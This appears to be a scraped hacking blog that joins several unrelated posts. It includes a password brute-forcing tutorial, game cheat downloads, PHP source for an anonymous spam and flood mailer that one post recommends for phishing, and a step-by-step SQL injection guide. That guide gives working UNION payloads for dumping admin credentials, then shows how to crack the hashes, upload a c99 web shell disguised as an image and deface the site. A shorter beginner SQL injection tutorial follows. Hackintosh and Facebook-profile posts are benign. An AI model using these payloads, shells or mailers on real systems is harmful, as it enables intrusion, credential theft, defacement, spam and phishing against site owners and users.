Related Posts Plugin for WordPress, Blogger...

How to Hack Passwords With C-Force Tutorial + Pics

First what i want to say is, that my english is not the best but i hope you can understand what i want to say!

This is how we get free passes for sites. C-Force only works on sites that are called Pop-Up sites.
Example, when you click on Members Sign In, and then the USERNAME/PASSWORD box pops-up, yeah its a pop up site.

Note: C-Force will not crack ocr forms (= form sites with a code vertification in a box)

So what do we need?

a) A copy of C-Force which you can download here:

b) A big, good proxylist with anon proxies which you please check in
with Charon

c) wordlist

Step 1: Start C-Force and open the tab “Settings”:
- Check this: “Skip proxy anonymity test” (we are checking our proxies with Charon)
- Never check this: “Use proxy for analyses” (it wouldn´t analyze the site correct)
- NEVER check this: “Bruteforce without proxies” (or you have good chances to go to jail)

Step 2: Open the tab “Pro” – Main Url, Analyse, Bruteforce

- Main Url: Get the members url by clicking on the members access section
For example: http://
Place this url into the Main url field


after clicking on

- Analyse: it looks like that


After that click on

- Bruteforce: After pressing “Bruteforce” you will be directed automaticly in the “Auto” menu


Step 3: Load Proxylist and Wordlist

Proxylist: Click the “Load” tab beside “Proxy-List:” and find saved Proxylist on your PC C-Force will let you know that your Proxies are loaded.

Wordlist: Click the “Load” tab beside “Combo-List:” and find saved Wordlist on your PC C-Force will let you know that your Wordlist is loaded.


After clicking on “START” will follow

Step 4: Hits, Check your hits in the right way


- Correct: Go to the login page and enter the username/password manually
- Wrong: Never click the link which is shown in the lower strip, for example:


You can use this option only for Pop-up login sites but NOT for form sites!

Finally the Result —> the door is open…pleace come in and enjoy sweet Member

Read More 4 Comments

Point Blank Cheat On the cheat ninja saga 12302010 and 12302010

1. Cheat Point Blank (PB) SNUTZ REVOLUTION December 30, 2010

F1 = Wallshot ON
F2 = Wallshot OFF

INSERT = Minimize ON (auto minimize)
DELETE = Minimize Off

F10 = Viper / Hide Helm
F11 = DFox / Leopard Helmet
F12 = Reset Char

Numpad 1 = Berets SG
Numpad 2 = Beret Sniper
Numpad 3 = Beret Assault
Numpad 4 = Berets SMG
Numpad 5 = Berets Pistol
Numpad 6 = Beret Item

HOME = Hack Title
END = Hack Rank / Points / Cash
F6 = BugTrap System (Special for CHATTY Find Offset)
F7 = Quick Exit Game
F9 = Spion Mode

How to Use Robot Char:
Choose Barrett - START-F10/F11 Pls loading - Finished Loading F12

Wallshot and Minimize handling system for non-exit cockroaches OFF

Credit by me: indrascott
Special Thanks to:
* AnasTM
* Rifqi36
CHEAT 30, 31, 122010, cheat pb, cheat point blank terbaru wallshot, cheat wallshot, cheat pb 31 desember 2010,
2. Cheat Point Blank (PB) Pasimbung v1.4 Nano December 30, 2010

Product Name: Nano version Pasimbung v1.4
Released: 30-12-2010
Creator: hrd
Greetz to:
[*] dono
[*] Drache
[*] John_Smith

Archive Type: ZIP
Included files: pasimbung.exe (exe: ASPacked, etc.: PESpinned)
: Readme.txt
Requirements: Flash player, the need to display the injector interface
Target Game: PointBlank
Anti-Cheat: AhnLab HackShield
Type: Trainer

[*] Map Hack, Luxville to CrackDown [F5 ON / OFF]
[*] Map Hack, Downtown to CrackDown [F6 ON / OFF]

Additional note: please copy and paste, but keep the credits!

How to use:
- Join room BM (luxvile / dt)
- Press the hotkey (F5/F6 [ON]) before the start
- Press the hotkey (F5/F6 [OFF]) on the loading screen

Do not forget Credit By hrd

3. Cheat Point Blank (PB) MICRO_INJECTOR December 30, 2010

Cheat / Trainer EffectL
[*] Minimize Pada Wikipedia: F5
[*] Minimize Off: F6
[*] Wallshot On: F9
[*] Wallshot Off: F10
[*] Spion On: F11
[*] TitleHack: F12

[*] Shotgun Baret: [Numpad-1]
[*] Sniper Baret: [Numpad-2]
[*] Assault Baret: [Numpad-3]
[*] Mitraliur Gun Baret: [Numpad-4]
[*] Pistol Baret: [Numpad-5]
[*] Baret GM: [Numpad-6]

download , extract and hold on to the Windows \ system32

continue to RUN

regsvr32 C:\WINDOWS\system32\GIFviewer.ocx

Creator: No Name
Special Thanks TO: Ba1mA2

4. Cheat PB 30 Desember 2010 30122010 5nutzeR A.1.0

PB Cheat December 30, 2010 30,122,010 5nutzeR A.1.0

F1 => WallShoT (On.)
F2 => WallshoT (Off)
F5 => Supreme Buster (Gun Shoot)
F6 => Still Assassin (Sniper)
F7 => Rowdy Beast (Assault)
F8 => Nimble Sneaker (Sub Machine Gun)
F9 => Shooting Star (Pistol)

Tutorials Usage:

- Press the Hotkey Beret What You Want Kan (example: F7 => Rowdy Beast [Assault])
- Press F1 => WallShot (On.)
- Start (Play)
- And So Loading Map, Press F2 .....

Credit By: Andiliu (5nutzer)

Download Cheat Point Blank December 30, 2010 30,122,010 5nutzeR A.1.0

PB Cheat December 30, 2010 5nutzeR A.1.0
Cheat Point Blank December 30, 2010 5nutzeR A.1.0
PB Cheat December 30, 2010 Point Blank 30,122,010 5nutzeR A.1.0
PB Cheat December 30, 2010 5nutzeR A.1.0 A.1.0 Point Blank 5nutzeR 30,122,010
Cheat Point Blank bp bp December 30 December 30 December 30 December 30, 2010 5nutzeR A.1.0

5. Cheat PB 30122010 30 Desember 2010 [P-M]Pamore

Cheat PB 30122010 December 30, 2010 [P-M] Pamore
- Dedication of the [P-M] Pamore
-No Junk
-No Flames
-No Belaguers
-Especially in this Thread ..

Released: 29/12/2010
Creator: penkUSN
Greetz to: US-Net Family
Anan bang
om bald
om benZ666
mbah eMonKie
om kewel
Special greetz to: OM maStaH Hero ™

Archive Type: RAR
Included files: => [P-M] paramore.exe
Target Game: PointBlank
Anti-Cheat: AhnLab HackShield Pro
Type: Trainer / Cheat
Cheat / Trainer Effect:

[™] Minimize On: F1
[™] Minimize Off: F2
[™] Hack Grade + title = F12

How to use:
[-] For when starting WAS Play On and Off at Loading screen Play

6. Cheat PB 30 Desember 2010 Point Blank 30122010 SM Sharemind V.3.5

PB Cheat December 30, 2010 - Update December 30, 2010 PB Cheat, Cheat Cheat or PB 30,122,010 30,122,010 Point Blank the which will from this time discuss about PB Cheat December 30, 2010 Point Blank 30,122,010 BC Sharemind V.3.5.

Cheat hotkey feature PB 31122010 [S] [M] V.3.5 ShareMind Injection
[*] Insert = WallShootON
[*] Delete = WallShoot OFF
[*] F9 = Spion
[*] F10 = TitleHack
[*] F11 = UnName <>>> Play
>>> loading the room tap Delete

How to Wear Berets
Click on the desired Hotkey beret right>>> Play
How to use Char Hack
Start>>> loading room click Numpad +>>> have any posts pas
"While Preparing Game" Direct click Numpad -

Read the Rules of Use - Use System ON OFF - DC / BT
Depending Use
On some antivirus will cause fals alarm, because the file
has been packing ....

Created By ninaShareMind
cheat pb 31 desember, cheat wallshot, auto exp point blank 30122010, wallshot, cheat pb wallshot, cheat 31122010,
Special Thank 's to: HRD - RCD - All

Download All Here

cheat pb 31 desember 2010, cheat pb 30 desember 2010, cheat pb 31 desember 2010, cheat point blank, cheat 30122010, cit pb 30122010, cheat pb, cheat pb, CHEAT POINT BLANK 31 DESEMBER 2010, cheat pb 31122010, cheat pb, cheat point blank 31122010, cheat pb 31 desember 2010, cheat pb 01 January, cheat pb 01 January, cheat pointblank 01012011, cheat pointblank 01 January 2011, cheat 01012011, cheat pb, cheat pb terbaru, cit pb 01012011, cheat pb 1 hit update 01 January, cheat pointblank 31 desember 2010, cheat point blank snutz tanggal 31 desember 2010, cheat pb 1 hit update 31 desember 2010, cheat Map Hack 30122010, cheat point blank 30 desember blogspot, cheat point blank 01 january blogspot,

Read More 1 Comment

Make a Different Facebook Profile - Tutorial

I don't know exactly where to post this , so i post it here..
Im sorry if this is wrong section.

I didn't write this Tutorial , i just found it and sharing it here.
But i've checked it and its working Oui

Here is what you'll get .

and Follow These Instructions :

Step 1: Upload your desired picture and let it to generate the correct images.

Step 2: Download the generated ZIP file of your images, or manually save them.

Step 3: First, set the image named "profile-pic.jpg" as your Facebook profile picture.

Step 4: Create a new photo album, then upload the other images in the order of their filenames.

Step 5: Tag yourself in all 5 photos, starting with "image5.jpg" and ending with "image1.jpg."

Step 6: Hide any tagged photos you do not wish to display on your profile. That's it!

Reply comment if you like this post ....

Read More 1 Comment

How to Install Mac OS X on a PC (Without Using a Mac)

There are many great tutorials on the web for using a Mac to install Mac OS X Snow Leopard on a PC. Unfortunately, you may be unable to follow such tutorials if you do not readily have access to a Mac to perform the preparation necessary for the installation.
Great progress has been made in hacking PCs to run OS X, and it is now possible to install Mac OS X without a Mac. Thanks to some great tools put together by some brilliant hackers, it is also much easier and does not involve nearly as much time and effort as was once required.

Step 1: Getting The Hardware Ready

I recently purchased the following set of hardware for the purposes of building a Hackintosh (often PCs running Mac OS X are referred to as such):
The motherboard has an 8-pin power connector on it, and although it is possible to connect a single 4-pin connector to it, you may encounter odd issues running with just a single 4-pin connector. To ensure that you provide sufficient power to the board, you should purchase the 4-pin to 8-pin power adapter. Alternatively, you could purchase a power supply with 3x 4-pin connectors (1 for the 20+4-pin main connector, and 2 for the 8-pin connection) or an 8-pin connector.
I did not purchase a hard drive or video card, as I used some I already had from another PC, but you will need those items as well. As of the time this article was written, you can get a 1TB drive shipped for $75 and an NVIDIA GeForce 9500 GT video card for $65.
I also purchased v10.6.3 of OS X Snow Leopard retail DVD for a mere $29 (was about $35 with shipping & handling).
All-in-all, the full system (without monitor) will run you around $600 (you could also add a 22″ monitor for $170). You could certainly try doing it even cheaper with different hardware, but you’ll need to figure out the appropriate changes to make in the BIOS and boot loader installation.
I did my best to put together a fairly modern system for a very reasonable price. Having used this set of hardware, I can affirm that it runs OS X Snow Leopard very well. Without a doubt, $600 – $800 is a far cry from what you would spend on an equivalent Mac from Apple. Granted it won’t be as compact or pretty as an iMac, but it will be just as functional.

Step 2: Putting The Hardware Together

If you purchase the hardware I used, along with a hard drive and NVIDIA GeForce video card, you should be able to follow the instructions exactly as I’ve laid them out. If you’ve never built a PC before but are willing to give it a try, you’ll definitely want to check out The Idiot’s Ultimate Guide to Build Your Own PC. It is a step-by-step guide to building your own PC, with plenty of photos to help you out.
You can try following this tutorial with existing hardware you have as well, although you may need to make adjustments when configuring the BIOS and installing the boot loader. The more modern your hardware is, the better the chances are it will work for you. It would be best if you have a 64-bit Intel dual-core (or quad-core) processor, although an older CPU might still work as well. I would recommend NVIDIA GeForce video card, but ATI cards should work too.

Step 3: Prepare The Boot Disk

In addition to the hardware and a retail copy of Mac OS X Snow Leopard, you’ll also need a blank CD. You may want to use a rewritable CD if you’re using a different hardware configuration, just in case the first one I recommend doesn’t work for you. There are two boot disk images that will allow you to install OS X directly from the installation DVD:
I successfully used both of them with my hardware setup. However I recommend you try iBoot first, as it is a bit leaner and doesn’t take as long to boot. If you’re using my hardware configuration, be sure to download the iBoot Supported disk image. If you use Empire EFI, download the Empire EFI v1.085 R2 image.
You can use one of many free programs to burn CDs if you don’t have one. Be sure to use the disk image burning mode in your CD burning software. Do not just simply copy the disk image file to a blank CD. I like InfraRecorder, because it makes this very easy. All you have to do is click the Write Image button, select the image, and burn it. Once again, you may wish to use rewritable media if you’re using a different hardware configuration than mine.

Step 4: Bios Configuration

Fortunately, the Gigabyte GA-H55M-USB3 does not require a lot of configuration to run Mac OS X. When you first turn on or reboot the machine, press the delete key to enter the BIOS setup. You can just load the Optimized Defaults, and just make a few changes within three sections of the bios: Advanced BIOS Features, Integrated Peripherals, and Power Management Setup.
4.1 – First, go to Advanced BIOS Features and set the First Boot Device to CDROM. I have my USB drive as the second drive and then Hard Disk as third – you can configure yours the same way if you wish to ever boot from a USB drive. Just be sure that Hard Disk is the Second Boot Device or Third Boot Device.
4.2 – Next, configure SATA to run in AHCI mode in the Integrated Peripherals menu. You’ll need to set both PCH SATA Control Mode and Onboard SATA/IDE Ctrl Mode to AHCI.
4.3 – Finally, go to Power Management Setup and set the HPET Mode to 64-bit mode.

Step 5: Installing Mac OS X

5.1 – Insert the iBoot (or Empire EFI) boot disk.
5.2 – When you see screen below, eject the disk.
5.3 – Insert the Retail Mac OS X Snow Leopard DVD, wait a few seconds, and press F5.
5.4 – When you see the screen below, select Mac OS X Install DVD (it should already be selected) and press Enter.
5.5 – If all goes well, you should eventually see the language selection screen for the installer. If all did not go well and you do not make it to the language selection screen, try downloading a different version of iBoot or Empire EFI.
5.6 – Select your language and click the arrow to proceed.
5.7 – Next, you need to partition your drive. Click on Utilities > Disk Utility.
5.8 – Select your disk drive.
5.9 – Click Partition.
5.10 – Select 1 Partition for the partition scheme. Note: If you have a drive that is larger than 2 TB, do not create partitions larger than 1 TB. Split the drive into multiple partitions, and be sure the main installation partition is 1 TB or smaller.
5.11 – Enter a name for the partition (I used Hackintosh).
5.12Select Mac OS Extended (Journaled) as the Format.
5.13 – Click Options…, select GUID Partition Table, and then click OK.
5.14 – Click Apply.
5.15 – Quit Disk Utility and proceed with the installation. Install on the Hackintosh partition.

Step 6: Installing the Boot Loader

Do not fret when you reboot after the installation and get a boot error, as you will need to first boot the machine with iBoot (or Empire EFI). Eject the Mac OS X Snow Leopard install DVD, put your boot CD back into the drive, and reboot the machine. Now when you boot up, you should see a second choice for your installation partition (Hackintosh if you named it that way). Select the Hackintosh partition and press Enter to boot into OS X.
Once you’ve completed the first-run setup, open up Safari and download Multibeast. Multibeast is another superb tool by tonymacx86 and MacMan that makes it stupid easy to install the boot loader, along with all the drivers necessary for your Hackintosh to function properly.
In addition to downloading Multibeast, you will need to download the DSDT for the Gigabyte GA-H55M-USB3 and copy it to the desktop. Be sure to save it as DSDT.aml. Launch Multibeast and make the following selections (your choices will differ if you have a different motherboard/hardware configuration):
  • UserDSDT
  • System Utilities
  • Advanced Options > Kexts > Audio > LegacyHDA > ALC889
  • Advanced Options > Kexts > Graphics > NVEnabler
  • Advanced Options > Kexts > Network > RealtekR1000SL
  • Advanced Options > Patched Kernels > 10.3.1 Supported Kernel

After MultiBeast finishes installing, eject the iBoot CD and reboot the system. You should be able to boot right up from the hard drive, and all your devices should work just fine.

Step 7: Getting Started with Your New Mac

So what now? Most certainly you’ll want to check out 5 apps to get more out of your new Mac as well as 15 must-have apps for your Mac. In fact, you should probably just go ahead and browse the entire Mac section on MakeUseOf, as you’ll find a wealth of great free stuff for your new Mac in there. And most importantly make sure to download MakeUseOf’s getting started manual for Mac. Highly recommended for switchers.
If ever you encounter into problems with your new Mac, you can always seek help from MakeUseOf Answers.
If you have any problems installing Mac OS X on your PC, just post a comment right here and we’ll do what we can to help. Just be sure to provide as much information about the hardware you’re using:
  • Motherboard make and model (i.e. Gigabyte GA-H55M-USB3)
  • CPU model (i.e. Intel Core i3-530 )
  • GPU model (i.e. NVIDIA GeForce 9900 GT)
I never managed to get sleep to work. When I try to put the computer to sleep, it sort of goes into a coma. The fans never shut down and the machine doesn’t wake up when you press the power button. If you manage to get sleep to work with my hardware configuration, please do feel free to share your solution in the comments on this article.
There are also many great forums and sites out there that provide a lot of information and assistance with running Mac OS X on PC. Here are just a few you may want to check out:
If you do seek assistance from any of these or similar resources, be sure to search for your problem before posting it. You will be flamed to no end if you ask a question that has already been answered. Another tip for posting in these forums: never call it a MAC (in all caps) instead of a Mac, or you will solicit many abusive responses. Mac is an abbreviation not an acronym.
Here are a few more links that provide tools and files to help you set up a Hackintosh on hardware other than what I’ve mentioned here:
  • myHack – Another bootloader/kext installer, similar to Multibeast
  • – A good resource for downloading Kexts (device drivers)
  • Kext Helper – A tool that makes it easy to install new Kexts
  • Kext Utility – A tool to ensure proper kext installation
  • Chamelon Boot Loader – The boot loader that pretty much all the boot disks out there use (including iBoot and Empire EFI).
  • netkas PC EFI – Used in combination with Chameleon to provide maximum compatibility for booting OS X. Most boot disks use this as well.
  • BootCDMaker (French) – Utility (for Mac) to create your own custom boot disks
A million thanks to tonymacx86 and MacMan for developing iBoot and Multibeast to make installing Mac OS X Snow Leopard on PC a piece of cake. Enjoy your new Hackintosh and let us know what you think of it!
Disclosure Statement: Please note that the links to the hardware in this article are affiliate links. MakeUseOf will earn a small commission on any purchases you make. Commissions earned will support the staff of MakeUseOf and allow us to continue to bringing you more great articles.
Disclaimer: Please note that running Mac OS X Snow Leopard on hardware other than a Macintosh is against the Mac OS X End User License Agreement (EULA). If you have concerns about this, you may wish to read Is Making Your Own Hackintosh Legal? By installing Mac OS X you are in breach of a contract (breaking a contract is not the same as breaking the law). As long as you own a legal copy of the software, you are not in violation of copyright law.

Spoiler For Source :

Read More 1 Comment

How to Easy Setup your own Anonymous Email (or Fake Email) Service !

What is anonymous email (or fake email)

Anonymous email, often referred to as prank email (or fake email), allows the user to send an email without disclosing their identity. The system uses a simple input form on a web page. Information is entered filling out the elements of a real email. Sender's and recipient's email addresses, subject and message body are usually the minimum required fields. Clicking on the send or submit button activates a script formats the information and then sends out the bogus text with the system mail utility. The recipient opens a real looking email from the fake address and reads the prank content. Prank email's primary purpose involves playing practical jokes on acquaintances. Some services offer canned pranks like a payment notification from an online adult "novelty" store with an itemized order confirmation. Most pranksters like to write their own situation specific pranks. The service can also be used to anonymously pass information. Beware, Internet forensics mean that only casual end users will be fooled. This is not the method of choice for agents of international intrigue, smugglers, or mercenaries. Savvy users who check their mail headers won't be fooled by prank email. Those using prank email for illegal purposes will discover that the anonymous service will turn over their router and server logs rather than be liable. In other words, recreational use only.

Method #1

What you will need

1) Host with PHP and Sendmail support
(for example FREE hosting was tested and works nice without ads, works fine but adds to messages annoying ads).
...or find another

2) PHP script by NOmeR1 "Sender Anonym Email :: FLoodeR :: SpameR"

<? /*
(C) NOmeR1
<title>Sender Anonym Email :: FLoodeR :: SpameR</title>
<? // error_reporting (0);
set_time_limit(0)) { $limit false;
} else { 
set_time_limit(0); ignore_user_abort(1); $limit true;
$log 'log.txt'// Log file
set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else
'<font color=Red>Off</font> (Working time is limited with the current settings of the server)');?><br>

$_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')
$_POST['to'] = stripslashes($_POST['to']); $_POST['msg'] = stripslashes($_POST['msg']); $_POST['from'] = stripslashes($_POST['from']); $_POST['subject'] = stripslashes($_POST['subject']);

$_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])
$headers "MIME-Version: 1.0\r\n"$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n"$headers .= "From: ".$_POST['from']."\n";
$_GET['mail'] == '1')
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
$_GET['mail'] == '2')
$_POST['to'] = explode("\n",$_POST['to']);
$_POST['to'] as $poluchatels)
mail($poluchatels$_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
$_GET['mail'] == '3')
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); sleep(1);
'Incorrect (or not entered) number of messages');
$f fopen($log,'a'); fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n"); fclose($f);
'<center><b><font color="green">Message succesfully sent</font></b></center>');
<form style="width:350px" method='post'>
<? if($_GET['mail'] == '1' || $_GET['mail'] == '3')
"Receiver &nbsp;<input type='text'name='to'><br>");
Sender <input type='text' name='from'><br>
Subject &nbsp;<input type='text' name='subject'><br>
<? if($_GET['mail'] == '3')
"Amount of messages <input type='text' name='kol'><br>");
htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br>
<? if($_GET['mail'] == '2')
"Receivers<br><textarea name='to' rows='10' cols='30'></textarea>"
<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>
<? }
} else { 
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple message</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Flood</a><br>
<? ?>

It's very easy. Just save the script above as mail.php and copy it to the server (via FTP or cPanel's File Manager) into your public_html dir and begin to send mails. Type in your browser for example <your_subdomain_name><yourfile.php>

Method #2

What you will need

1) Host with PHP and Sendmail support (for example
2) AJAX project (Anonymous Mail).
(Source code was taken from, Author of project: with support LiveDev Group, GPL license)

Features of the project

- Using UTF8 (you can use any characters in your messages)
- Using HTML и TXT/plain formats
- You can send letters with any return address
- Supports attachments
- Using AJAX without page reloading

It's very easy. Just decompress and copy files to the server (via FTP or cPanel's File Manager) and begin to send messages.
1. File --> multiupload
2. Pasword--> HFthebest

Method #3

What you will need

1) Host with PHP and Sendmail support
2) Dark-Mailer V.2.2 © by p0LYM0rPH2012 and ZyphoMud DarkenedCore Admin Team

Features of the project

- Anonymous mailing
- Spam massmailing
- Mail grabber alpha-version
- Using HTML и TXT/plain formats
- Supports attachments

Copy file Dark-Mailer V.2.2.htm (better rename it) to the server (via FTP or cPanel's File Manager) and begin to send messages.

How to use:

Simply fill out the form and press the "Send"-Button. You can attach a file, which will be uploaded to the server, encoded for the Email and then be deleted from the server(If PHP Safe-Mode is not active). If you wish, you can spam around by inserting a lot of Email-Adresses and let the script pass through this list about 1000 times ;). The PHP execution time depends if Safe-Mode's on! If you type "{email}" in the "Subject" or "Message" field the script will exchange it with the Email-Adresse you typed in the "Your Email" field. You can set the Email to a plain text Email or a HTML-Email (with or without parsing BBCodes)...good for Phishers ;)
Supported BBCode Tags:
Now you can try out the new E-Mail Grabber. Type an URL and the Grabber will search for E-Mails on the site. The Grabber is Alpha.

1. File: multiupload
2. Pasword: HFthebest

Method #4

What you will need

1) The script requires host with PHP 5 support - because of the function call htmlspecialchars_decode, you need to turn "back to HTML" received from TinyMCE data. Of course, writing your analogue of this function, can use the script and the previous versions of PHP. The file "time" should be writable.
2) PHPMailer script.
Source code was taken from and translated from Russian to English

Features of the project

Presented script, in fact, is simply "cheat" over a similar function call mail. To write and edit messages in HTML format, it uses the excellent (about 1.5 Mb in the decompressed state) library TinyMCE, plus contains several additional features for validating input data, set limits on the time between retry, etc. This script allows you to create the message body in a WYSIWYG-editor, like an ordinary Microsoft Word, and send the letter as plain text (the switch to the right of the button "Reset"). Time to re-send, as well as restrictions on the maximum message size and the maximum length of words are set in config.php. After sending letters to the script leaves a letter in the form and allows you, after you specify the number of seconds, send again. I think it is easy to add to post.php a few lines of code to send out a letter on the list of addresses stored in a text file. This version of the script does not requires MySQL. Attaching a file to a letter in this version of the script is not available, but you can embed links to external resources, including graphics. If you want full support for attachments - add to library TinyMCE modules MCFileManager and MCImageManager, configure them and place on the host. The official website of these modules are invited to buy, but if a little try, you can find anyway.

It's very easy. Just decompress and copy files to the server (via FTP or cPanel's File Manager) and begin to send messages. To send message you must enter correct digital number.
1. File: multiupload
2. Pasword: HFthebest

And I Finish, Goodluck

Read More 7 Comments

SQL INJECTION (From start to Defacement)



I i took some parts of the sql injecting from I wrote the defacing part. I'm posting this here coz this tut explains everything step by step. but most of the sql tuts ends when we find the password hash. So newbees dnt know wat to do after that. In this tut i'm gonna explain how to deface a website from scratch hope you fill find this usefull....
i'm not a good hacker but i want to share my knowledge with every one.. so if there are any mistakes pls forgive me....
If you find this tut usefull please post a comment.... Black Hat


First we must find our target website to do that you can use this "dorks".
I'll give some dorks here copy anyone of it and paste it in google and search.


you can find lots of dorks here..(use them without the " " marks)

1). Check for vulnerability

Let's say that we have some site like this

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error. order by 1/* <-- no error order by 2/* <-- no error order by 3/* <-- no error order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

4). Check for MySQL version union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e. union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e. union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version :D

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names. union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : ) union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie. union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.


** if you are too lazy for doing above stuff you can use tools they will do all the job:
1) Exploit scanner (this will find vulnerable websites)
2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

in some websites you can directly see the password. but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. to crack the password there are three ways
1) check the net whether this hash is cracked before:
2) crack the password with the help of a site:
3) use a MD5 cracking software:
Password = OwlsNest


after getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.
1) you can use an admin finder website:
2) you can use an admin finder software:

after logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

dowload the shell here(shells are php scripts which affects websites so it will be detected as trojans but no need to worry i take the responsibility):
extract it you will get a c99.php upload it.
some sites wont allow you to upload a php file. so rename it as c99.php.gif
then upload it.

after that go to (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)
find the c99.php.gif and click it..
now you can see a big control pannel....
now you can do what ever you want to do...
search for the index.html file and replace it with your own file. so if any one goes to that site they will see your page....

after doing this click logout.... thats it you are done...Yeye

Read More 8 Comments

How To hack Website

THE LINKS DONT WORK: Just copy paste them

For my purposes, i will use as an example, this site is hackable.
if you try on this site, and it does NOT work, that means either i spelt the url wrong (silly me) or that the site has been fixed

Dont be to harsh on me for making it so nooby, i didnt get any of the articles explaining sql injections when i was first learning
if you get lost, keep reading, it might explain what you do not understand ahead.

Well, yeah, self explanitory. OK, here, in this article, i will teach you how to hack a website.
The method we are going to use is called mysql injection. Sql mean, "structured query language".
What this means, is that this programming language lets you send queries (a request for information and such) to a database and access hidden, or "confidential files" such as passwords, and usernames, if you catch my drift. A database is an orginized body of related data, or in simpler terms, like all the vital info stored on the website, and vital coding, or "scripting"(the programming) i think (im not very smart). Well, when making a mysql injection, you have to determine (find out) wether or not a site is vulnerable first (vulnerable, as in, you can make a proper mysql injection, or more simplified, if the web site can be hacked). To find out wether or not a site is vulnerable, you need to change the url. Simple isnt it. But, to get proper results, you need to find a url, that contains a VARIABLE <--------this is VERY important) An example of a url that contains a variable, is

The variable in this Url (website adress) is "cat_id=10"
A variable is a snipet of code or information that is assigned a value. like for example


now, lets say this;


do you understand?

it is a value pretty much. The value of this variable "cat_id=10" is 10.
Now, to determine wether or not you CAN hack this site. What you need to do, is make a change to the url, like i said before
now, this url, "" must have something ADDED to it. At the end of the url,
add ' thats right, just add '
so the new url is:'
now if the site you want to hack is vulnerable, you should get and error message on the page. there are other ways to determine wether or not a site is vulnerable to mysql injections, dont get me wrong, but for my purposes, this is the way i will show you.

